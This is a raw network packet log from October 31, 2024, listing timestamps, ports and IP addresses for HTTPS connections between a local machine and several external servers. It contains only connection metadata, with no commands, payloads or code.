Oct 31, 2024 19:19:21.942147017 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.942173958 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.942219019 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.942264080 CET	49742	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:21.942264080 CET	49742	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:21.942303896 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.943367004 CET	49742	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:21.977082014 CET	49744	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:21.977197886 CET	443	49744	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.977300882 CET	49744	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.047873020 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.047972918 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.048103094 CET	49742	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.085469007 CET	49742	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.085500002 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.110658884 CET	49748	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.110686064 CET	443	49748	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.111006021 CET	49748	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.111541986 CET	49749	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.111577988 CET	443	49749	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.111638069 CET	49749	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.112941027 CET	49750	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.112952948 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.113007069 CET	49750	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.113867998 CET	49748	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.113888025 CET	443	49748	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.114061117 CET	49749	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.114078045 CET	443	49749	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.116710901 CET	49750	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.116723061 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.117269993 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.117286921 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.117330074 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.118331909 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.118345022 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.118434906 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.120141983 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.120156050 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.120637894 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.120650053 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.725271940 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.726187944 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.726212978 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.727241039 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.727319002 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.734520912 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.734592915 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.734823942 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.734834909 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.739412069 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.739995956 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.740009069 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.741833925 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.741899014 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.742793083 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.742877007 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.742997885 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.743005991 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.809772968 CET	443	49747	142.250.185.228	192.168.2.4
Oct 31, 2024 19:19:22.810194969 CET	49747	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:19:22.810209990 CET	443	49747	142.250.185.228	192.168.2.4
Oct 31, 2024 19:19:22.811640978 CET	443	49747	142.250.185.228	192.168.2.4
Oct 31, 2024 19:19:22.811713934 CET	49747	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:19:22.812886953 CET	49747	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:19:22.812967062 CET	443	49747	142.250.185.228	192.168.2.4
Oct 31, 2024 19:19:22.853389978 CET	49747	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:19:22.853401899 CET	443	49747	142.250.185.228	192.168.2.4
Oct 31, 2024 19:19:22.939337969 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.939867020 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.940128088 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.940152884 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.956101894 CET	49747	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:19:22.962029934 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.962320089 CET	49750	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.962335110 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.963824987 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.963891029 CET	49750	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.965826988 CET	49750	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.965914011 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.966001034 CET	49750	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.966007948 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.976330996 CET	443	49749	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.976674080 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.976686001 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.976726055 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.976735115 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.976747990 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.976762056 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.976777077 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.976778030 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.976800919 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.976823092 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.978219032 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.978226900 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.978241920 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.978250980 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.978269100 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.978272915 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.978282928 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:22.978302002 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.978338957 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:22.978373051 CET	49749	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.978383064 CET	443	49749	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.978756905 CET	443	49749	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.980515003 CET	49749	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.980592966 CET	443	49749	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.983999014 CET	49749	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.989615917 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.989636898 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.989655972 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.989670992 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.989680052 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.989712000 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.989727974 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.989758015 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.989758968 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.989779949 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.990497112 CET	443	49748	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.991240025 CET	49748	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.991250992 CET	443	49748	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.991683960 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.991694927 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.991720915 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.991730928 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.991739035 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.991750956 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.991808891 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.991808891 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.991808891 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:22.991822004 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:22.992351055 CET	443	49748	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.992403030 CET	49748	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.992855072 CET	49748	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:22.992934942 CET	443	49748	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:22.992973089 CET	49748	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.027340889 CET	443	49749	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.035326004 CET	443	49748	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.049474955 CET	49750	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.049555063 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.065483093 CET	49748	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.065491915 CET	443	49748	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.106849909 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.106862068 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.106919050 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.106936932 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:23.106950045 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.106960058 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.106975079 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:23.106997013 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:23.108350992 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.108369112 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.108434916 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:23.108443022 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.108489037 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:23.109179974 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.109201908 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.109252930 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.109257936 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.109266996 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.109291077 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.109303951 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.109314919 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.109314919 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.109359980 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.111433029 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.111452103 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.111488104 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.111535072 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:23.111543894 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.111558914 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.111586094 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:23.111608982 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:23.111641884 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:23.112296104 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.112307072 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.112368107 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.112379074 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.112394094 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.112423897 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.112426996 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.112483978 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.113477945 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.113501072 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.113545895 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.113554001 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.113595009 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.113610983 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.114135981 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.114159107 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.114231110 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.114238977 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.114315987 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.114315987 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.121284008 CET	49754	443	192.168.2.4	151.101.66.137
Oct 31, 2024 19:19:23.121310949 CET	443	49754	151.101.66.137	192.168.2.4
Oct 31, 2024 19:19:23.167053938 CET	49748	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.213113070 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.213157892 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.213165998 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.213188887 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.213200092 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.213212967 CET	49750	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.213232040 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.213249922 CET	49750	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.223190069 CET	49750	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.223237991 CET	443	49750	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.223283052 CET	49750	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.228455067 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.228477001 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.228545904 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.228560925 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.228574038 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.228652954 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.229284048 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.229304075 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.229350090 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.229358912 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.229368925 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.229497910 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.230221987 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.230241060 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.230328083 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.230328083 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.230335951 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.230389118 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.230710983 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.230793953 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.230830908 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.230830908 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.232985973 CET	443	49749	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.233012915 CET	443	49749	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.233066082 CET	49749	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.233087063 CET	443	49749	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.233182907 CET	49749	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.249113083 CET	443	49748	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.250715017 CET	49753	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:23.250732899 CET	443	49753	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:23.276465893 CET	49749	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.276535034 CET	443	49749	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.276693106 CET	443	49749	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.276746035 CET	49749	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.276762009 CET	49749	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.327409983 CET	49748	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.327423096 CET	443	49748	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.339428902 CET	49748	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:23.339507103 CET	443	49748	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:23.339585066 CET	49748	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:24.040321112 CET	49767	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.040366888 CET	443	49767	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.040482998 CET	49767	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.040491104 CET	49768	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.040517092 CET	443	49768	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.040604115 CET	49768	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.040735006 CET	49767	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.040749073 CET	443	49767	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.041321039 CET	49768	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.041332960 CET	443	49768	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.083934069 CET	49769	443	192.168.2.4	172.217.18.2
Oct 31, 2024 19:19:24.083969116 CET	443	49769	172.217.18.2	192.168.2.4
Oct 31, 2024 19:19:24.084062099 CET	49769	443	192.168.2.4	172.217.18.2
Oct 31, 2024 19:19:24.084332943 CET	49769	443	192.168.2.4	172.217.18.2
Oct 31, 2024 19:19:24.084352970 CET	443	49769	172.217.18.2	192.168.2.4
Oct 31, 2024 19:19:24.645737886 CET	443	49767	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.647665977 CET	49767	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.647680044 CET	443	49767	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.648116112 CET	443	49767	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.648159027 CET	443	49768	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.648197889 CET	49767	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.648582935 CET	49768	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.648607016 CET	443	49768	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.648823023 CET	443	49767	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.648895979 CET	49767	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.649257898 CET	443	49768	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.649312973 CET	49768	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.650309086 CET	443	49768	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.650357962 CET	49768	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.650763035 CET	49767	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.650832891 CET	443	49767	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.650926113 CET	49768	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.651005983 CET	443	49768	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.651271105 CET	49767	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.651278973 CET	443	49767	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.651587963 CET	49768	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.651597023 CET	443	49768	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.746545076 CET	49772	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:24.746598005 CET	443	49772	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:24.746723890 CET	49772	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:24.747679949 CET	49773	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:24.747741938 CET	443	49773	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:24.747884989 CET	49773	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:24.748367071 CET	49774	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:24.748379946 CET	443	49774	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:24.748439074 CET	49774	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:24.748742104 CET	49772	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:24.748761892 CET	443	49772	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:24.749144077 CET	49773	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:24.749166012 CET	443	49773	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:24.749289036 CET	49774	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:24.749300957 CET	443	49774	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:24.826003075 CET	443	49767	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.826092005 CET	49767	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.826114893 CET	443	49767	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.827347994 CET	443	49767	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.829214096 CET	49767	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.834950924 CET	443	49768	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.836642981 CET	443	49768	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:24.836721897 CET	49768	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:24.956438065 CET	443	49769	172.217.18.2	192.168.2.4
Oct 31, 2024 19:19:25.050682068 CET	49769	443	192.168.2.4	172.217.18.2
Oct 31, 2024 19:19:25.108266115 CET	49769	443	192.168.2.4	172.217.18.2
Oct 31, 2024 19:19:25.108288050 CET	443	49769	172.217.18.2	192.168.2.4
Oct 31, 2024 19:19:25.108937025 CET	49767	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:25.108963966 CET	443	49767	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:25.109577894 CET	443	49769	172.217.18.2	192.168.2.4
Oct 31, 2024 19:19:25.109591961 CET	443	49769	172.217.18.2	192.168.2.4
Oct 31, 2024 19:19:25.109656096 CET	49769	443	192.168.2.4	172.217.18.2
Oct 31, 2024 19:19:25.111921072 CET	49768	443	192.168.2.4	216.239.34.181
Oct 31, 2024 19:19:25.111943960 CET	443	49768	216.239.34.181	192.168.2.4
Oct 31, 2024 19:19:25.112232924 CET	49769	443	192.168.2.4	172.217.18.2
Oct 31, 2024 19:19:25.112312078 CET	443	49769	172.217.18.2	192.168.2.4
Oct 31, 2024 19:19:25.112416983 CET	49769	443	192.168.2.4	172.217.18.2
Oct 31, 2024 19:19:25.155339003 CET	443	49769	172.217.18.2	192.168.2.4
Oct 31, 2024 19:19:25.159701109 CET	49769	443	192.168.2.4	172.217.18.2
Oct 31, 2024 19:19:25.159727097 CET	443	49769	172.217.18.2	192.168.2.4
Oct 31, 2024 19:19:25.340022087 CET	49769	443	192.168.2.4	172.217.18.2
Oct 31, 2024 19:19:25.379406929 CET	443	49769	172.217.18.2	192.168.2.4
Oct 31, 2024 19:19:25.460402012 CET	49769	443	192.168.2.4	172.217.18.2
Oct 31, 2024 19:19:25.460454941 CET	443	49769	172.217.18.2	192.168.2.4
Oct 31, 2024 19:19:25.484980106 CET	49769	443	192.168.2.4	172.217.18.2
Oct 31, 2024 19:19:25.485061884 CET	443	49769	172.217.18.2	192.168.2.4
Oct 31, 2024 19:19:25.485122919 CET	49769	443	192.168.2.4	172.217.18.2
Oct 31, 2024 19:19:25.490820885 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:25.490864992 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:25.490987062 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:25.491319895 CET	49778	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:25.491358995 CET	443	49778	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:25.491471052 CET	49778	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:25.491549015 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:25.491565943 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:25.491797924 CET	49778	443	192.168.2.4	151.101.193.229
